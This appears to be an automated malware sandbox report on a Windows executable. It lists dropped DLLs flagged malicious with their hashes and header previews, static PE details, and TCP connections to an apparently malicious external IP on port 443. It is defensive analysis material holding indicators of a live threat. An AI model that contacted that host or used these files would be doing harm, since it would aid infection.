                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......lU.*(4.y(4.y(4.y!L<y.4.y!L-y34.y(4.y.4.y...y#4.y(4.y=4.y!L;y.6.y!L*y)4.y!L,y)4.y!L)y)4.yRich(4.y................PE..L...#..]...........!.................................................................:...............................A.......6..x.......0...........................p...................................@...............(............................text............................... ..`.rdata..XY.......Z..................@..@.data............t..................@....rsrc...0............Z..............@..@.reloc..,............`..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Roaming\im\libjpeg-turbo-win.dll

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):713456
                                                                                                                                Entropy (8bit):6.620067101616198
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12288:RPCS0cSUktNimb/JZqNFcbJ3bZJNlvI8CjBMUC6eVc4/SK:RPCS0c1ktNimbqYZJNlvVc4L
                                                                                                                                MD5:96D413CAAF8C7793A96EF200F6695922
                                                                                                                                SHA1:ABFB19A5BEA8724A08A3C709B68C65178E8EFBE5
                                                                                                                                SHA-256:5C6E5346C4EF80E1DD211BD5519311ACA01025CE1D3811113A03E657938F370D
                                                                                                                                SHA-512:93BF7AC89AE64948C3E91294DE89478B0F92D9CEFB71C803ABB324E181D783801C87DD6D806B0DB0D3737B3330E37993AE07B9B7D5AACCA9F9F5C3556E23EEE4
                                                                                                                                Malicious:true
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./..k...k...k....%B.b....%@....%A.r...P..z...P..}...P..d...Fx.h...k...=...k...J......Y......j.....L.j...k.$.j......j...Richk...........PE..L...Q.xX...........!.........$.......P....................................... ............@.........................0....... ...(.......@........................8..0p..p............................p..@...............\............................text...9........................... ..`.rdata..............................@..@.data...(...........................@....gfids..d...........................@..@.rsrc...@...........................@..@.reloc...8.......:..................@..B................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Roaming\im\libssl-1_1.dll

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):541880
                                                                                                                                Entropy (8bit):5.766958615909
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12288:ghUZvMdmP9OwMJvP2jkIgEIdwKADpiw7FCPU2lvzTNl:BhMsPG2udwLdigFyU2lvzTNl
                                                                                                                                MD5:753B75570811052953F336261E3031BB
                                                                                                                                SHA1:2244CCE49368180C1CF6BCA0C57DAEC71401C4F7
                                                                                                                                SHA-256:603C5FD4E29C14DF02937DF765BF76E067A7A4706130D93F947106D0AE09A9DE
                                                                                                                                SHA-512:6C81B813A79077E7157CF7F647A1F3C31A71098037C7003BC40B70E4AADAFCF490FDC01C71A26F8FED8C97BA33B41DF5B8A0D479DA951459CBD56421705813C5
                                                                                                                                Malicious:true
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............K...K...K..wK...K..J...K..J...K..J...K..J...K..J...K)..J...K...Km..K)..J...K)..J...K)..K...K)..J...KRich...K................PE..L.....7a...........!.........................................................p............@..........................)...N........... ..s............ ...$...0...5......8...........................H...@............................................text............................... ..`.rdata...g.......h..................@..@.data....;.......6...`..............@....idata..=A.......B..................@..@.00cfg..............................@..@.rsrc...s.... ......................@..@.reloc..`=...0...>..................@..B................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Roaming\im\mk7r31.bmp

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 168x299, components 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):8097
                                                                                                                                Entropy (8bit):7.94099711365173
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:E9NXj7fQ9/RRN0AinryQKGgjkrEQtxH1AYZ18r:E9NzjGkOujEQ3H1V8r
                                                                                                                                MD5:2302BC48A162783A6A41C278B3F54145
                                                                                                                                SHA1:8C3272769F604DC3AE6C6B98A29CC779532D1783
                                                                                                                                SHA-256:1E5F58772571897E96CCA5ACB597DF65F8775E64D7031D6B2CCDBF22D5181F51
                                                                                                                                SHA-512:465086DFF63176A864C0BC26BCCFA1FBBA0503F9AFD78A86C863C266469F54069D00BBB718440090A065EA92AD0DD42A67B6A6C99ED6B2378F6A721984A806A6
                                                                                                                                Malicious:false
                                                                                                                                Preview:......JFIF...................................................( ..&...!1!%)+.....383-7(-.+...........-! .--------------------------------------------------......+...."........................................@........................!1.A.."Qaq..2..#BR...3br........CS...s...............................(......................!.1.AQa".2Rq3...............?.........X..R|.[..X[q....9*$........Q.t.......E..Sv+9.[..a.......J..T..9@.F'..-...$..R.S.\...,.).T..+.T..My.S".]zt.....^.{.EXP.....i..z."].'..6G.H.kU.Q..W5..%i..F..n.{4 .n.m.B.O.h..#.=..$..|*...5..|'Z......e?...y>6Z...]....]`..Q.<..)..=....H..N..Z.~....O..qL...j.<.......EE......6Z/P>,....P..i.\..PK.W...5..o.........2.\.t./....j8.3/...|a-%.hx...v.}.Bw.Keck.{....c....G....Z..9o......h.m.Nj..."...j..:...T.n.*Ts........z...K.gl..?O:..F9. /./...,...>...........S.h...m.\..T....5R|..p......cO..g\M.?....3...JB.......4..$....|.[.Z...7...|j..H..r...Y.xcs.e.;...'..%h?..|fh..oV....j...y\gH.x8....'..8..Qe.G.^.c...^u.

                                                                                                                                C:\Users\user\AppData\Roaming\im\msvcr120.dll

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):970912
                                                                                                                                Entropy (8bit):6.9649735952029515
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12288:LBmFyjLAOQaYkxGXPfY7eiWWcpOKnpTVOIxhK765qlRRb6x4pI23IbJQV:dmFyjLF847eiWWcoGZVOIxh/WxIAIbGV
                                                                                                                                MD5:034CCADC1C073E4216E9466B720F9849
                                                                                                                                SHA1:F19E9D8317161EDC7D3E963CC0FC46BD5E4A55A1
                                                                                                                                SHA-256:86E39B5995AF0E042FCDAA85FE2AEFD7C9DDC7AD65E6327BD5E7058BC3AB615F
                                                                                                                                SHA-512:5F11EF92D936669EE834A5CEF5C7D0E7703BF05D03DC4F09B9DCFE048D7D5ADFAAB6A9C7F42E8080A5E9AAD44A35F39F3940D5CCA20623D9CAFE373C635570F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S9...XlA.XlA.XlA..A.XlA.XmA.XlAQ..A.ZlAQ..AvXlAQ..A!XlAQ..A.XlAQ..A.XlAQ..A.XlAQ..A.XlARich.XlA........PE..L....|OR.........."!................D............................................... .....@.........................`........R..(....p...................>......d]..@...8...........................H...@............P...............................text............................... ..`.data...4e.......V..................@....idata.......P......................@....rsrc........p.......0..............@..@.reloc..d].......^...4..............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Roaming\im\opus.dll

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):370488
                                                                                                                                Entropy (8bit):6.86993159214619
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6144:wJ9LiOhPhz85popbbFb06wAQAwq961b/v9MkvCq2/JO+UxK6DvX0C7Uxm//f0Ps7:IBi8q5po9JkyICq2/z6DvsyEE5+PgAEX
                                                                                                                                MD5:82E49683F540F78B2D1759CDE594482F
                                                                                                                                SHA1:352DCBDBBB3C5C927B83389E2AB7F40B66EE716A
                                                                                                                                SHA-256:55D99ECD7F821A4B2FE7E5A0B2CEA213DC79004C1DC413BD003F032C61080576
                                                                                                                                SHA-512:F50A3BCD5905103EEC344D7DAF1C17896DF9039D3E8D5E9BBD771F1E235EC6045D626ED838C9BF3A8F7A66AA5F41F0743EA7D9BDEF7492DA8B36561089E126BF
                                                                                                                                Malicious:true
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........k-...~...~...~.......~....l..~.......~.......~.......~.......~.......~...~...~]...k..~]......~]..~...~]......~Rich...~........PE..L....g._.........."!.................U....... ...................................... .....@..........................^......\h..(.......................8.......l....W...............................W..@............ ...............................text............................... ..`.rdata..6N... ...P..................@..@.data...8....p.......^..............@....rsrc................h..............@..@.reloc..l............j..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Roaming\im\quartz.dll

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1074302464
                                                                                                                                Entropy (8bit):0.0076066072746656796
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:
                                                                                                                                MD5:F9EE295F34E22150DB8EDD2392482148
                                                                                                                                SHA1:60B9700E56D3D79FB0B2DA7DE1E3B964AC4522A4
                                                                                                                                SHA-256:5040D2F22275B4C59FA1D282440B228CA1327A66D5A82A9C6D313271EBAEE91E
                                                                                                                                SHA-512:E8FFDF207E8FC62543D9FE51423053F4F762CFC9C5106A422E1A3F30D96478AEC34C9CE7E381DE2FBA3B0745D1A4723EDEC626528E8EB4C5898D58E764F674AA
                                                                                                                                Malicious:true
                                                                                                                                Preview:MZ..............@.......@...............................................!..L.!This program cannot be run in DOS mode...$........PE..L...Q..c...........!...I.p........... ... ..........................................ru....@.....................................................................V....................................................................................edata..............................@..@.code...9o... ...p.................. ..`.data...9............v..............@....rdata..............................@..@.reloc..V...........................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                Static File Info

                                                                                                                                General

                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                Entropy (8bit):7.995848928313772
                                                                                                                                TrID:
                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                                                                                • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                File name:wjpP1EOX0L.exe
                                                                                                                                File size:6'810'986 bytes
                                                                                                                                MD5:34dc961fe0a98ea779d7b673a48c77a0
                                                                                                                                SHA1:7f3cf770da67a60d60c79c82df85eef66eb80d8e
                                                                                                                                SHA256:7ea97972b7a7e37bdc6993c7f00830040acf4ce957243abb85d6c1232baf30c0
                                                                                                                                SHA512:c30c1dd3e4d9f532f5dcd06d95a426769cf9009fd42a1a735463a379d567475fb05708af09c2e79f9aca332b4c3803fc435017ee36e52741cff98790830ccdfb
                                                                                                                                SSDEEP:98304:wasa2kc7PO6oUeKdwO3DpUKgtMnjdxspn/w1fdpgH4LDnVsF+U96vFJvulvy5QE1:PXUzF3DiKgx8fuKnVspq6leQE4qLxj
                                                                                                                                TLSH:176633209BE24872FD9C1B748DA586507E233CAE05F1A8282FFCD56E05BB4559C37F92
                                                                                                                                File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                                                File Icon

                                                                                                                                Icon Hash:2d2e3797b32b2b99

                                                                                                                                Static PE Info

                                                                                                                                General

                                                                                                                                Entrypoint:0x4117dc
                                                                                                                                Entrypoint Section:.itext
                                                                                                                                Digitally signed:false
                                                                                                                                Imagebase:0x400000
                                                                                                                                Subsystem:windows gui
                                                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                Time Stamp:0x57051F88 [Wed Apr 6 14:39:04 2016 UTC]
                                                                                                                                TLS Callbacks:
                                                                                                                                CLR (.Net) Version:
                                                                                                                                OS Version Major:5
                                                                                                                                OS Version Minor:0
                                                                                                                                File Version Major:5
                                                                                                                                File Version Minor:0
                                                                                                                                Subsystem Version Major:5
                                                                                                                                Subsystem Version Minor:0
                                                                                                                                Import Hash:20dd26497880c05caed9305b3c8b9109

                                                                                                                                Entrypoint Preview

                                                                                                                                Instruction
                                                                                                                                push ebp
                                                                                                                                mov ebp, esp
                                                                                                                                add esp, FFFFFFA4h
                                                                                                                                push ebx
                                                                                                                                push esi
                                                                                                                                push edi
                                                                                                                                xor eax, eax
                                                                                                                                mov dword ptr [ebp-3Ch], eax
                                                                                                                                mov dword ptr [ebp-40h], eax
                                                                                                                                mov dword ptr [ebp-5Ch], eax
                                                                                                                                mov dword ptr [ebp-30h], eax
                                                                                                                                mov dword ptr [ebp-38h], eax
                                                                                                                                mov dword ptr [ebp-34h], eax
                                                                                                                                mov dword ptr [ebp-2Ch], eax
                                                                                                                                mov dword ptr [ebp-28h], eax
                                                                                                                                mov dword ptr [ebp-14h], eax
                                                                                                                                mov eax, 00410144h
                                                                                                                                call 00007F86D451757Dh
                                                                                                                                xor eax, eax
                                                                                                                                push ebp
                                                                                                                                push 00411EBEh
                                                                                                                                push dword ptr fs:[eax]
                                                                                                                                mov dword ptr fs:[eax], esp
                                                                                                                                xor edx, edx
                                                                                                                                push ebp
                                                                                                                                push 00411E7Ah
                                                                                                                                push dword ptr fs:[edx]
                                                                                                                                mov dword ptr fs:[edx], esp
                                                                                                                                mov eax, dword ptr [00415B48h]
                                                                                                                                call 00007F86D451FCC3h
                                                                                                                                call 00007F86D451F812h
                                                                                                                                cmp byte ptr [00412ADCh], 00000000h
                                                                                                                                je 00007F86D45227BEh
                                                                                                                                call 00007F86D451FDD8h
                                                                                                                                xor eax, eax
                                                                                                                                call 00007F86D4515615h
                                                                                                                                lea edx, dword ptr [ebp-14h]
                                                                                                                                xor eax, eax
                                                                                                                                call 00007F86D451C85Bh
                                                                                                                                mov edx, dword ptr [ebp-14h]
                                                                                                                                mov eax, 00418658h
                                                                                                                                call 00007F86D4515BEAh
                                                                                                                                push 00000002h
                                                                                                                                push 00000000h
                                                                                                                                push 00000001h
                                                                                                                                mov ecx, dword ptr [00418658h]
                                                                                                                                mov dl, 01h
                                                                                                                                mov eax, dword ptr [0040C04Ch]
                                                                                                                                call 00007F86D451D172h
                                                                                                                                mov dword ptr [0041865Ch], eax
                                                                                                                                xor edx, edx
                                                                                                                                push ebp
                                                                                                                                push 00411E26h
                                                                                                                                push dword ptr fs:[edx]
                                                                                                                                mov dword ptr fs:[edx], esp
                                                                                                                                call 00007F86D451FD36h
                                                                                                                                mov dword ptr [00418664h], eax
                                                                                                                                mov eax, dword ptr [00418664h]
                                                                                                                                cmp dword ptr [eax+0Ch], 01h
                                                                                                                                jne 00007F86D45227FAh

                                                                                                                                Data Directories

                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x190000xe04.idata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x1c0000xb200.rsrc
                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x1b0000x18.rdata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x193040x214.idata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                Sections

                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                .text0x10000xf2440xf400a33e9ff7181115027d121cd377c28c8fFalse0.5481717469262295data6.3752135040515485IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                .itext0x110000xf640x1000caec456c18277b579a94c9508daf36ecFalse0.55859375data5.732200666157372IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                .data0x120000xc880xe00746954890499546d73dce0e994642192False0.2533482142857143data2.2967209087898324IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                .bss0x130000x56bc0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                .idata0x190000xe040x1000e9b9c0328fd9628ad4d6ab8283dcb20eFalse0.321533203125data4.597812557707959IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                .tls0x1a0000x80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                .rdata0x1b0000x180x2003dffc444ccc131c9dcee18db49ee6403False0.05078125data0.2044881574398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                .rsrc0x1c0000xb2000xb200c68efe629086e79e677a2d7600755b88False0.1776465941011236data4.139057824973333IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                Resources

                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                RT_ICON0x1c41c0x128Device independent bitmap graphic, 16 x 32 x 4, image size 192DutchNetherlands0.5675675675675675
                                                                                                                                RT_ICON0x1c5440x568Device independent bitmap graphic, 16 x 32 x 8, image size 320DutchNetherlands0.4486994219653179
                                                                                                                                RT_ICON0x1caac0x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640DutchNetherlands0.4637096774193548
                                                                                                                                RT_ICON0x1cd940x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152DutchNetherlands0.3935018050541516
                                                                                                                                RT_STRING0x1d63c0x68data0.6538461538461539
                                                                                                                                RT_STRING0x1d6a40xd4data0.5283018867924528
                                                                                                                                RT_STRING0x1d7780xa4data0.6524390243902439
                                                                                                                                RT_STRING0x1d81c0x2acdata0.45614035087719296
                                                                                                                                RT_STRING0x1dac80x34cdata0.4218009478672986
                                                                                                                                RT_STRING0x1de140x294data0.4106060606060606
                                                                                                                                RT_RCDATA0x1e0a80x82e8dataEnglishUnited States0.11261637622344235
                                                                                                                                RT_RCDATA0x263900x10data1.5
                                                                                                                                RT_RCDATA0x263a00x150data0.8392857142857143
                                                                                                                                RT_RCDATA0x264f00x2cdata1.1818181818181819
                                                                                                                                RT_GROUP_ICON0x2651c0x3edataEnglishUnited States0.8387096774193549
                                                                                                                                RT_VERSION0x2655c0x4f4dataEnglishUnited States0.25630914826498424
                                                                                                                                RT_MANIFEST0x26a500x62cXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4240506329113924

                                                                                                                                Imports

                                                                                                                                DLLImport
                                                                                                                                oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                                                advapi32.dllRegQueryValueExW, RegOpenKeyExW, RegCloseKey
                                                                                                                                user32.dllGetKeyboardType, LoadStringW, MessageBoxA, CharNextW
                                                                                                                                kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetSystemInfo, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenW, lstrcpynW, LoadLibraryExW, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetCommandLineW, FreeLibrary, FindFirstFileW, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle, CloseHandle
                                                                                                                                kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleW
                                                                                                                                user32.dllCreateWindowExW, TranslateMessage, SetWindowLongW, PeekMessageW, MsgWaitForMultipleObjects, MessageBoxW, LoadStringW, GetSystemMetrics, ExitWindowsEx, DispatchMessageW, DestroyWindow, CharUpperBuffW, CallWindowProcW
                                                                                                                                kernel32.dllWriteFile, WideCharToMultiByte, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, SizeofResource, SignalObjectAndWait, SetLastError, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, RemoveDirectoryW, ReadFile, MultiByteToWideChar, LockResource, LoadResource, LoadLibraryW, GetWindowsDirectoryW, GetVersionExW, GetVersion, GetUserDefaultLangID, GetThreadLocale, GetSystemInfo, GetSystemDirectoryW, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesW, GetExitCodeProcess, GetEnvironmentVariableW, GetDiskFreeSpaceW, GetCurrentProcess, GetCommandLineW, GetCPInfo, InterlockedExchange, InterlockedCompareExchange, FreeLibrary, FormatMessageW, FindResourceW, EnumCalendarInfoW, DeleteFileW, CreateProcessW, CreateFileW, CreateEventW, CreateDirectoryW, CloseHandle
                                                                                                                                advapi32.dllRegQueryValueExW, RegOpenKeyExW, RegCloseKey, OpenProcessToken, LookupPrivilegeValueW
                                                                                                                                comctl32.dllInitCommonControls
                                                                                                                                kernel32.dllSleep
                                                                                                                                advapi32.dllAdjustTokenPrivileges

                                                                                                                                Possible Origin

                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                DutchNetherlands
                                                                                                                                EnglishUnited States

                                                                                                                                Network Behavior

                                                                                                                                Network Port Distribution

                                                                                                                                TCP Packets

                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Nov 19, 2024 18:56:11.432239056 CET49825443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:11.432286024 CET44349825212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:11.432380915 CET49825443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:11.571480036 CET49825443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:11.571520090 CET44349825212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:12.397347927 CET44349825212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:12.397428036 CET49825443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:12.399642944 CET49825443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:12.399656057 CET44349825212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:12.400054932 CET44349825212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:12.482558012 CET49825443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:12.482917070 CET49825443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:12.482947111 CET44349825212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:12.483010054 CET49825443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:12.483017921 CET44349825212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:12.483063936 CET49825443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:12.495984077 CET49836443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:12.496040106 CET44349836212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:12.496377945 CET49836443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:12.496841908 CET49836443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:12.496862888 CET44349836212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:13.214344025 CET44349836212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:13.214436054 CET49836443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:13.215898037 CET49836443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:13.215905905 CET44349836212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:13.216243029 CET44349836212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:13.216919899 CET49836443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:13.218395948 CET49836443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:13.218787909 CET44349836212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:13.218898058 CET49836443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:13.218929052 CET44349836212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:13.218981028 CET44349836212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:13.219034910 CET49836443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:13.219058990 CET49836443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:13.234390020 CET49844443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:13.234436989 CET44349844212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:13.234503031 CET49844443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:13.236056089 CET49844443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:13.236073971 CET44349844212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:14.055160999 CET44349844212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:14.055318117 CET49844443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:14.056607008 CET49844443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:14.056612968 CET44349844212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:14.056962967 CET44349844212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:14.058372021 CET49844443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:14.058829069 CET49844443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:14.058868885 CET44349844212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:14.058932066 CET49844443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:14.058995008 CET44349844212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:14.059032917 CET44349844212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:14.059081078 CET49844443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:14.059139013 CET49844443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:14.071691990 CET49852443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:14.071738005 CET44349852212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:14.071835041 CET49852443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:14.072529078 CET49852443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:14.072541952 CET44349852212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:14.782737017 CET44349852212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:14.782820940 CET49852443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:14.784168959 CET49852443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:14.784197092 CET44349852212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:14.784477949 CET44349852212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:14.785121918 CET49852443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:14.785348892 CET49852443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:14.785356045 CET44349852212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:14.786365986 CET49852443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:14.786470890 CET44349852212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:14.786472082 CET49852443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:14.786499977 CET44349852212.193.169.65192.168.2.4
